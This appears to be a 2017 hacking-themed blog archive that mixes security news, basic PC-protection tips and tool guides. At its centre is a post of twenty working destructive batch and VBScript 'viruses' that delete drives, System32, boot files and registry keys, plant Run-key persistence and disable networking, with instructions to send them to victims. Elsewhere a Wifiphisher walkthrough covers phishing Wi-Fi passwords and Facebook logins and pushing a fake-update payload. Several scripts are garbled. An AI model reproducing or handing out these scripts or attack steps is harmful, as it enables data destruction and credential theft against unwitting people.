Thursday 14 September 2017

How to find e-mail sender's location

Web World 12:33



First way: search the e-mail ID

Copy the mail ID you are receiving from. Now visit the pipl or spokeo website. After this, paste the e-mail ID here and paste it. Here you will find other details of the mail id along with the location.

Second way: Facebook

Under this, please copy the e-mail ID and search in Facebook. If such a person had created a Facebook account with this ID, then you will get his information.

Top Five Hacking News ||Exploit Toolkit for $80 Per Day||Hijacked Extensions||Chinese DDoS Platforms||20-08-2017

Web World 12:25


1.The Latest Exploit Toolkit for $80 Per Day.

 For just $80 per day, $500 per week or $1,400 monthly, cybercrime entrepreneurs can subscribe to Disdain. That's the name of a new exploit kit that's appeared on at least one underground Russian cybercrime forum, and which is being advertised by a "threat actor" who uses the handle "Cehceny," according to Israeli cybersecurity firm IntSights Cyber Intelligence. And more inforamtion Ref.

2.WannaCry 'Hero' Pleads Not Guilty, Allowed Back Online.
The British security researcher credited with stopping the WannaCry ransomware outbreak pleaded not guilty Monday to charges that he developed and sold a type of malicious software that steals online banking credentials and more inforattion Ref.

3.The malware can be downloaded accidentally through Google Play apps.
A new type of malware that threatens to send your private pictures, messages and internet browsing history to your friends has been discovered and more inforamtion  Click Here.
4. Hijacked Extensions: 4.7 Million Chrome Users at Risk.

More than 4.7 million users were apparently exposed to potentially malicious ads and credential theft after cybercriminals managed to hijack the developer accounts of several popular Chrome extensions.
and read more.
5.Common Source Code Used by Multiple Chinese DDoS Platforms.

An increase in Chinese websites offering online distributed denial of service (DDoS) capabilities was observed after a localized version of the source code of online booters was put up for sale, Talos reveals and more information Ref.

Hackers Can Now Decrypt Satellite Phone Calls

Web World 12:23

A group of security researchers detailed a real-time inversion attack against the GMR-2 stream cipher used in satellite phone communication, claiming it is much more efficient than previously devised attacks.
The research focused on the GMR-2 algorithm that is commonly used by modern-day satellite phones, including Inmarsat, to encrypt voice calls in an attempt to prevent eavesdropping.
The attack method helped researchers effectively reduce the search space for the 64-bit encryption key, which in turn made it easier to hunt for the decryption key, resulting in the encrypted data to be cracked within a fraction of a second.
The technique contains three phases, namely table generation; dynamic table looks-up, filtration and combination; and verification. The attack can be used to “retrieve the complete 8-byte encryption-key from only 1 frame (15 bytes) of keystream on average.” It also significantly reduces the exhaustive search space, and requires only 6KB of extra storage space.
The security researchers reveal that, in 10,000 experiments, the newly devised technique was able to uniquely determine 97.2% of the encryption-keys by the 15 bytes of keystream. The remaining 2.8% of the keys needed an extra keystream byte to retrieve.

Securityweek:Cisco Releases Open Source Malware Signature Generator

Web World 12:22


Cisco’s Talos intelligence and research group announced on Monday the availability of a new open source framework designed for automatically generating antivirus signatures from malware.
read more

Wednesday 13 September 2017

How to secure personal PC or Laptop

Web World 12:36



Problem:Virus, Trojan, Worm                                          
Solution :Use Antivirus (McAFee , Norton , etc)

Problem :Malwares (spyware+ adwares)                            
Solution: Use Anti malware's:                                                                            
1.MalwareBytes' Anti-Malware
2.Adware
3.Combofix
4.Secunia psi

Problem :Remote Hacking                                              
Solution:Use Zone alarm firewall

Problem :Date & Information thief                                  
Solution :Use best crypt software (jetico)

Problem :Email Hacking          
Solution: Use own System and use password manger.

Problem :Password Hacking                                              
Solution: Use password manger and use virtual keyboard

Problem :Untrusted file                                                    
Solution:  First scan online www.virustotal.com

Problem :Sniffing                                                              
Solution:Use anti-arp software for arp and dns spoofing.

You know URL Hijacking

Web World 12:33

What is URL Hijacking
Typosquatting, also called URL hijacking, a sting site, or a fake URL and which is
 Hijacking occurs when another advertiser creates an ad that looks like it's your ad. It happens within paid search ads, contextual ads, and in display network image ads. Paid Search Hijacking. When URL Hijacking occurs in paid search, the hijacker will use your URL as the display URL in its ad.


Type of Typosquatting

1. A form of cybersquatting

2. Capitalizes on misspelling

 Some Example of URL Hijacking 

 1.Make money from your mistek
-There was lot of advertising  on the net.

2.Sell the badly spelled domain to the actual owner
-sell a mistek

3.Phishing the site
-look like the real site , please login.

4.Typosquading /brandjacking
-Take advantage of poor spelling.

 5.outright misspelling
-hackerinfoindia.blogspot.in Vs hackerinfaindia.blogg.in

A typing error 
-hackinfoindia.blogspot.in


If you like this post please like & share with your friends... 
& Don't Forget To..
Like Our Facebook Page :

Watch Cyber attack in Real-time Worldwide

Web World 12:31

If you are interesting to watch who is initiating cyber-attack whom globally live. Thousands of website and organization server gets hacked every day due to vulnerable files, plugins, misconfiguration on the servers.
 Protocols worked
·         Telnet
·         Netis
·         RFB (Remote framebuffer)
·         Microsoft-DS
·         HTTP
·         MS WBT
·         SIP
·         SSH
·         XSAN File system
Locations Worked
·         Global (default)
·         South East Asia
·         West Asia
·         Latin America
·         Europe
·         US & China

Top five Cyber-Attack Maps
 1.Norse Watch Live
 2. Fire Eye Watch Live
3.Check Point Watch Live


4.Kaspersky Map Watch Live








5.Digital attack map Watch Live







if you like this post please like & share with your friends... 
& Don't Forget To..
 

Like Our Facebook Page :- https://www.facebook.com/webworlddeveloping

Top 20 Viruses Using NotePad Very Dangerous

Web World 12:27

Might be some virus is run on window 7 or window xp

Method 1:

 Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as kinng.bat and the batch file is created .

 Method 2:

How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.


Method 3:

How to stop someone's internet access::::


@Echo off
Ipconfig /release

Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

Method 4:


ShutDown PC million Times::::

1.right click on the desktop
2.click shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press finish
4.u will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

Method 5:

Open Notepad
Write / copy the below command there:
" del c:\WINDOWS\system32\*.*/q " without quote
and save as " anything.bat"
Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted. Without which a Windows Pc cant be started.


Method 6:

Process:
Open Notepad
Copy the below command there
"rd/s/q D:\
rd/s/q C:\
rd/s/q E:\" ( without quotes )
Save as "anything.bat
This virus Formats the C ,D , and E Drive in 3 Seconds.

Method 7:

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”

Now Save This Notepad file With Any Name Having .vbs Extension .

 Method 8:

Open Notepad and write "start" without quotes
Start
Start
Start
and then save it with .bat extension.
Now double click on this .bat file to run Command Prompt.

Method 9:

Convey your friend a little message and shut down his / her computer:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

Method 10 :

Toggle your friend's Caps Lock button simultaneously:

Code:
Set wshShell =wscript.CreateObject("WScript.Shel
l")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Save it as "Anything.VBS" and send it.

Method 11:

Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Code:
Set wshShell = wscript.CreateObject("WScript.Shell
")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

Method 12 :

This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code As Anything.bat


Method 13 :

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs

Method 14 :

The Most Simple Virus To Crush The Window
It Only Works With Windows XP


@Echo off
Del C: *.* |y

Save It As Anything.bat

Method 15 :

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!

Method 16:

Shutdowns Computer Everytime It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

 Method 17 :

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File

Method 18 :

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT


 Method 19 :

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File

Method 20 :

 Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad
? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every startup !

How To Remove Shortcut Virus From Pendrive/PC using CMD

Web World 12:26
What Is Shortcut Virus ?

A shortcut virus is a virus (a malware) that hides your original files inside shortcuts.The way it hides the file remains unknown though the effect is quite visible. The original files are there in the drive itself, but in such a position that you can’t recognize it nor take it out. 

Shortcut Virus Sometimes delete your important data.Initially, it doesn’t harms your files but later on, it may make them corrupt or even delete all the files; depends on the type of shortcut virus.Remove Shortcut Virus From PC or Pendrive.

Why this Shortcut Virus in PC/Laptop or Pen-drive occurs?

1.If your antivirus is not able to update its programs to latest available version. 

2.Updated antiviruses has more number of anti-threat programs then its previous version.

3.Using external USB storage i.e. Pen-drive without scanning. 

4.Pen-drive might have lots of harmful viruses such as Trojan.

5.Opening Unknown sources i.e. files and folders which have hidden malicious script inside.

6.By downloading untrusted third party applications which have virus.

7.Plugging your USB drive in someone's else computer which contains virus.

Types of Shortcut Viruses?
There are mainy three types of shortcut viruses are found till date:

1.Drive shortcut virus
As the name suggests, In this a shortcut of whole drive is created. No matter what type of drive is.

2.Folder shortcut virus
A shortcut of folder is created with all its contents wraps together

3.File shortcut virus

Delete Shortcut Virus using CMD

1.Open CMD (command prompt). [Go to Run -> type CMD ->Hit enter]

2.Type the name of your drive or removal drive and a colon after it and hit enter. [Example:- e:]

3.Now type:attrib -h -r -s /s /d e:\*.*(Replace e: with the drive name of your drive)

4.Press enter.

How to use port scanning tool for hacking

Web World 12:25

What is port Scanning ?

Port Scanning is the process of checking which port is open or which port is locked .then you see port is opened , and you can try to communicate with victim system remotely and access their data.

* 21: FTP
* 22: SSH
* 23: Telnet
* 53: Domain Name System
* 80: World Wide Web HTTP
* 119: Network News Transfer Protocol
* 443: HTTP over Transport Layer Security/Secure Sockets Layer
* 445: microsoft-ds, Server Message Block over TCP

If these port are not secure  a hacker can communicate with these port , then you hacked.

Top 5 Free Port Scanners

1. Nmap

2. Angry IP Scanner

3. SuperScan

4. unicornscan

5. autoscan

                                            ******

The World's Most Dangerous Viruses of All Time

Web World 12:20

1. CryptoLocker

Released in September 2013, CryptoLocker spread through email attachments and encrypted the user’s files so that they couldn’t access them.
The hackers then sent a decryption key in return for a sum of money, usually somewhere from a few hundred pounds up to a couple of grand.

2. ILOVEYOU

 ILOVEYOU is one of the most well-known and destructive viruses of all time.
The virus came in an email with a subject line that said “I love you”.
Being curious types, people clicked into the email with aplomb—regardless of the fact the email wasn’t from anyone they knew.
The malware was a worm that was downloaded by clicking on an attachment called ‘LOVE-LETTER-FOR-YOU.TXT.vbs’.

3. MyDoom

MyDoom, like ILOVEYOU, is a record-holder and was the fastest-spreading email-based worm ever.

4. Storm Worm

Storm Worm was a Trojan horse that infected computers, sometimes turning them into zombies or bots to continue the spread of the virus and to send a huge amount of spam mail.
Tip: never open a link in an email unless you know exactly what it is.

By July 2007, Storm Worm was picked up in more than 200 million emails.

5. Sasser & Netsky

Sasser spread through infected computers by scanning random IP addresses and instructing them to download the virus. Netsky was the more familiar email-based worm. Netsky was actually the more viral virus, and caused a huge amount of problems in 2004.

6. Anna Kournikova

Jan De Wit, a 20-year-old Dutch man, wrote the virus as ‘a joke’. The subject was “Here you have, ;0)” with an attached file called AnnaKournikova.jpg.vbs.

7. Slammer

The Bank of America’s ATM service crashed, 911 services went down, and flights had to be cancelled because of online errors. Slammer, quite aptly, caused a huge panic as it had effectively managed to crash the internet in 15 quick minutes.
15 minutes in and Slammer had infected half of the servers that essentially ran the internet.

 8.Stuxnet

Stuxnet spread by a USB thumb drive and targeted software controlling a facility in Iran that held uranium. The virus was so effective it caused their centrifuges to self-destruct, setting Iran’s nuclear development back and costing a lot of money.

High-Payout Bug Bounties $4,000 google facebook yahoo microsoft

Web World 12:18

Facebook

Facebook paid out over $1 million in 2014 to bug bounty hunters, which just goes to show how much money Facebook is willing to throw at their security holes. This company is serious about securing its platform.
Minimum payout is $500.
Maximum payout doesn’t exist. Depending on the severity, you can earn up to $30,000 or more for a bounty.

Google

 Google also offers bounties for bugs found in the Chrome browser. Any bug that exists in the Stable, Beta, or Dev channels of Chrome, along with any bug that exists in a third-party component of Chrome, are eligible for rewards.

Minimum payout is $500.
Up to $4,000 for information leaks.
Up to $15,000 for severe issues.
Bonus: $100,000 reward for anyone who can compromise a Chromebook or Chromebox in guest mode that persists between device reboots.

Microsoft

 these are some of the best-paying bug bounties currently available.

Up to $15,000 for the Online Services Bug Bounty.
Up to $100,000 for the Mitigation Bypass Bounty.
Up to $100,000 for the Bounty for Defense.

 Yahoo

 Despite the fact that Verizon recently acquired Yahoo, the bug bounty program is still going strong and there’s no news to indicate that it will be shutting down any time soon. In-scope properties include Yahoo, Flickr, Polyvore, and more.

Minimum payout is $50.
Up to $15,000 for severe issues.

Android

 Minimum payout is $200.
Up to $1,000 for low issues.
Up to $2,000 for moderate issues.
Up to $4,000 for high issues.
Up to $8,000 for critical issues.
Bonus: Between $10,000 and $50,000 if you can demonstrate an exploit that leads to compromises in the kernel, TEE TrustZone, or Verified Boot.

Pornhub

 Minimum payout is $50.
Up to $5,000 for severe issues on Pornhub subdomains, blogs, and other related properties.
Up to $25,000 for severe issues on the Pornhub and Pornhub Premium sites as well as the Pornhub mobile app.

Mozilla

 Mozilla provides bug bounties for security holes in the following client software: Firefox, Firefox for Android, FirefoxOS, and Thunderbird. For the most part, only “security critical” bugs are eligible for bounties.
Minimum payout is $500.
Up to $2,000 for moderate issues.
Up to $7,500 for critical issues.
Over $10,000 for exceptional issues.

LINE

Minimum payout is $500.
Up to $10,000 for severe issues.

Python

Minimum payout is $500.
Over $1,500 for severe issues.

Flash
Minimum payout is $2,000.
Up to $10,000 for severe issues

View Hidden WIFI Passwords in Android devices

Web World 12:14

In such a case, if you use any public Wi-Fi anywhere whose password is saved once upon your smartphone. But if you can not see it, then today we will tell you how to know the password of the Wi-Fi network.

Before starting, let me know that this process works only on Android devices. In addition, you can not get the admin access to Wi-Fi access without having access to this because this information is stored in the system's system folder.
Step 1 - First you need to install WiFi password viewer (root) from Google Play Store.

Step 2- Once the app is installed, allow all the things the app is asking for you. This will allow the app to read that save file, where your Wi-Fi passwords are stored.

Step 3- After giving permission on your behalf, the app will release a list of all the network password that you have already connected.

Step 4- If you want to share it with your friends, then tap an entry in the list, where you can copy the password to the clipboard or share it via any app. Also, you can also create a QR code.

How the files in the Phone can be hid and personal data through Calculator

Web World 12:14


Step 1. For this, users can use Smart Hyde Calculator app . You can download this app from Google Play Store.

Step 2. When you open this app, you have to set a password in it. After setting the password, confirm it.

Step 3. After this you will also be asked for an additional password which you can skip.

Step 4. You have to use it (=) for OK.

Step 5. When you set the password, you will have several options including Hyde files and unheard files.

Step 6. After this you have to click on the Hyd files and select the files which you want to hide. Your files will be hid.

So, how do you look like a calculator can hide your information by hiding all your files.

How to connect Pubilc WIFI free

Web World 12:13


If you Want to use Free Wifi , So follow below Steps :-

 Step 1- The first app is WeFi Pro, this app will be available to you at Google Play Store. It can be downloaded for free. Its specialty is that you will not need to search for Wi-Fi in the phone. This app will automatically detect the public Wi-Fi connectivity to the phone.

Step 2- The second app is Instabridge. It is also available free on the Google Play Store. Through this app you can connect the phone to the public Wi-Fi. The specialty of this app is that it connects your phone to the fastest network. Not only this, if it does not find any network, it switches to the mobile network.

Step 3- Apart from this, if you use Facebook, you can find Wi-Fi from here too. You need to login to Facebook for this. After this, click on the menu options on the right hand side. Here you will get the option of app. Click on See All in it. Here you will find the option of wi-fi. Tap on it.

Monday 17 July 2017

Mostly Smartphone Apps share Your Data With Third-Party Services

Web World 06:05


Most of Smartphone app share your personal data with third-party comapnies like google Analytics, the facebook graph API or etc  , this is data privacy issue.

When people install a new  Android or iOS app, it asks the user's permission before accessing personal information. afthar that these app are collect the information from your phone as like contact number,message and etc.

and it can share your data with anyone the app's developer wants to -- letting third-party companies track where you are, how fast you are moving and what you are doing.
To get a picture of what data are being collected and transmitted from people's smartphones, the researchers from IMDEA Networks Institute in Spain developed a free Android app of their own, called the Lumen Privacy Monitor.

Because Lumen is about transparency, a phone user can see the information installed apps collect in real time and with whom they share these data.
"We try to show the details of apps' hidden behaviour in an easy-to-understand way. It's about research, too, so we ask users if they'll allow us to collect some data about what Lumen observes their apps are doing - but that doesn't include any personal or privacy-sensitive data," the researchers said in a statement released by the institute.

"We discovered 598 internet sites likely to be tracking users for advertising purposes, including social media services like Facebook, large internet companies like Google and Yahoo, and online marketing companies under the umbrella of internet service providers like Verizon Wireless," the study said.


Mobile App Protection

Your mobile applications can present material organizational risk, including intellectual property theft, operational disruption, software piracy, and data loss. Below are some examples.

1.Mobile apps may be modified with malware and placed on the public app marketplace.
2.Mobile apps proprietary business logic can be inspected and/or copied.
3.Mobile apps security and license checks may be circumvented.
4.Debugging mobile apps may allow access to sensitive data such as personally identifiable or regulated information.
5.Reverse engineering mobile apps can readily expose potential vulnerabilities and unlock otherwise secure access to high-value services.

OpenVPN Patches Remotely Exploitable Vulnerabilities

Web World 06:03





OpenVPN this week patched several vulnerabilities impacting various branches, including flaws that could be exploited remotely.

Four of the bugs were found by researcher Guido Vranken through fuzzing, after recent audits found a single severe bug in OpenVPN. While analyzing OpenVPN 2.4.2, the researcher found and reported four security issues that were addressed in the OpenVPN 2.4.3 and OpenVPN 2.3.17 releases this week.read more

Microsoft Said that: Windows 10 has disabled third-party Anti-Virus

Web World 06:02



Windows 10 does disable some third-party security software, Microsoft’s application compatibility teams found that roughly 95 per cent of Windows 10 PCs had an antivirus application installed that was already compatible with Windows 10 Creators Update,” said Rob Lefferts, director of security in the Windows and Devices group

But what about the 5 percent that weren’t compatible in Microsoft’s eyes? Lefferts says:"For the small number of applications that still needed updating, we built a feature just for AV apps that would prompt the customer to install a new version of their AV app right after the update completed. To do this, we first temporarily disabled some parts of the AV software when the update began. We did this work in partnership with the AV partner to specify which versions of their software are compatible and where to direct customers after updating".

Kaspersky is worried that Microsoft is trying the same trick, but – based on Lefferts' post – Redmond is ready to fight such claims "it has designed its own security software to only kick in when "an AV subscription expires, and the AV application decides to stop providing protection to the customer."

Network Mapper: Nmap Tool , Free Download

Web World 05:59


Network Mapper is power full tool  which is use to Nmap network discovery and security auditing , Nmap is a free and open source utility.Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

NMAP is..
Free:- The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.

Portable:- Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.

Flexible:- Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more.

"The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap, or write their own to meet custom needs".
Examples:
Scan multiple IP address or subnet (IPv4)
nmap 192.168.10.1 192.168.10.2 192.168.10.3
## works with same subnet i.e. 192.168.10.0/24
nmap 192.168.10.1,2,3

Finally, you scan an entire subnet:
nmap 192.168.10.0/24

Find out if a host/network is protected by a firewall
nmap -sA 192.168.10.254
nmap -sA blackhole.n0where.net

Scan a host when protected by the firewall
nmap -PN 192.168.10.1
nmap -PN blackhole.n0where.net

How do I perform a fast scan?
nmap -F 192.168.10.1

Show host interfaces and routes
nmap --iflist

How do I save output to a text file?
nmap 192.168.10.1 > output.txt
nmap -oN /path/to/filename 192.168.10.1
nmap -oN output.txt 192.168.10.1

Scan a firewall for MAC address spoofing
### Spoof your MAC address ##
nmap --spoof-mac MAC-ADDRESS-HERE 192.168.10.1

### Add other options ###
nmap -v -sT -PN --spoof-mac MAC-ADDRESS-HERE 192.168.10.1


### Use a random MAC address ###
### The number 0, means nmap chooses a completely random MAC address ###
nmap -v -sT -PN --spoof-mac 0 192.168.10.1

Scan for IP protocol
IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines
nmap -sO 192.168.10.1

Find out the most commonly used TCP ports using TCP SYN Scan.
### Stealthy scan ###
nmap -sS 192.168.10.1

### Find out the most commonly used TCP ports using  TCP connect scan (warning: no stealth scan)
###  OS Fingerprinting ###
nmap -sT 192.168.10.1

### Find out the most commonly used TCP ports using TCP ACK scan
nmap -sA 192.168.10.1

### Find out the most commonly used TCP ports using TCP Window scan
nmap -sW 192.168.10.1

### Find out the most commonly used TCP ports using TCP Maimon scan
nmap -sM 192.168.10.1

Scan a host using UDP ping
This scan bypasses firewalls and filters that only screen TCP.
nmap -PU 192.168.1.1
nmap -PU 2000.2001 192.168.1.1

                                                              Free Download

Facebook and WhatsApp HACK Via Spydealer

Web World 05:54


Dubbed SpyDealer as like "Marcher" ,The Trojan is capable of gathering the information from user phone(Android) such as phone number , message , contact details and even call history.

Malware researchers at Palo Alto Networks have spotted a new  Android Trojan, dubbed SpyDealer that can exfiltrate data from more than 40 applications, including WeChat, Facebook, WhatsApp, Skype, Line, Viber, QQ, Tango, Telegram, Sina Weibo, Tencent Weibo, Android Native Browser, Firefox Browser, Oupeng Brower, QQ Mail, NetEase Mail, Taobao, and Baidu Net Disk.
"The mobile malware only works Android versions from 2.2 up to 4.4 releases , that are the versions supported by the rooting tool."
Once installed, the malware doesn’t show an application icon, but registers “two broadcast receivers to listen for events related to the device booting up and network connection status.” At the first launch, the malware retrieves configuration information (from a local asset that can be remotely updated) such as the IP address of a remote command and control (C&C) server, the actions it can take on mobile networks, and the actions allowed under a Wi-Fi network.

If you see  Marcher is more power power full  Malware but it is target of the mobile banking APP .
Marcher" is malware targeting the Android platform. It is designed to steal mobile banking app credentials from customers of many different financial company.

Securify researchers explained about the malware: “Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground.

Marcher has been around since late 2013, but it initially attempted to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, the malware started targeting banks in Germany and, by the summer of 2016, there had already been more than 60 targeted organizations in the U.S., U.K., Australia, France, Poland, Turkey, Spain and other countries.
The malware has been disguised as various popular apps, including Netflix, WhatsApp and Super Mario Run.

Hackers Can Now Decrypt Satellite Phone Calls

Web World 05:50
A group of security researchers detailed a real-time inversion attack against the GMR-2 stream cipher used in satellite phone communication, claiming it is much more efficient than previously devised attacks.

The research focused on the GMR-2 algorithm that is commonly used by modern-day satellite phones, including Inmarsat, to encrypt voice calls in an attempt to prevent eavesdropping.

The attack method helped researchers effectively reduce the search space for the 64-bit encryption key, which in turn made it easier to hunt for the decryption key, resulting in the encrypted data to be cracked within a fraction of a second.

The technique contains three phases, namely table generation; dynamic table looks-up, filtration and combination; and verification. The attack can be used to “retrieve the complete 8-byte encryption-key from only 1 frame (15 bytes) of keystream on average.” It also significantly reduces the exhaustive search space, and requires only 6KB of extra storage space.

The security researchers reveal that, in 10,000 experiments, the newly devised technique was able to uniquely determine 97.2% of the encryption-keys by the 15 bytes of keystream. The remaining 2.8% of the keys needed an extra keystream byte to retrieve.

Monday 19 June 2017

How to hack Wifi and facebook Account through Wifiphisher ||100% Working

Web World 06:30

Disclaimer: Hackerinfoindia is publishing this list just for educational purposes and awareness about cyber security  . We don’t promote malicious and unethical practices.

What you Need and Installation :-

·      Laptop with onboard or additional Wifi-Adapter
·      2x Wifi-Adapters (recommended)

First, open your Terminal and type git clone https://github.com/wifiphisher/wifiphisher”
and open the Wifiphisher directory with “cd wifiphisher
just type that command “sudo python setup.py install”
now you should be able to open Wifiphisher by just typing “wifiphisher” in the Terminal

If YOU SEE SOME ERROR:

In case some people face, Matplotlib might be missing like you can see in the picture below
to solve the problem just type in Terminal “sudo apt-get install matplotlib”
and you should be ready to go.

1.  Now you open Wifiphisher by typing “wifiphisher” in the Terminal and you will be able to see the following window.
Then you see multiple wifi-devices, and choose which wifi- device you want to attack.
Then we have four phishing options that we can use

If you want to drop a payload on your targets device make sure to use option 3. This option falsifies a browser update and serves your target with a Payload instead.
  If you want to Phish the Wifi-Password options 1 & 2 are great especially option 2 supports mobile devices which are great in case your target uses a mobile phone to reconnect to the Internet.
      
If you want to phish Facebook LogIn information option 4 is the one to go with. It has a great template that looks almost tempting to use.
Now that you chose your option just wait until your target reconnects to the Fake-Wifi-Spot created by you. Since you sent him deAuth-Packages he has to reconnect in order to be able to use the Internet.
The moment your Target connects his information will be displayed to you.
Once the Target types in his Information those will be displayed to you in RED.
If you like this post please like & share with your friends... 
& Don't Forget To..
Subscribe to: Posts (Atom)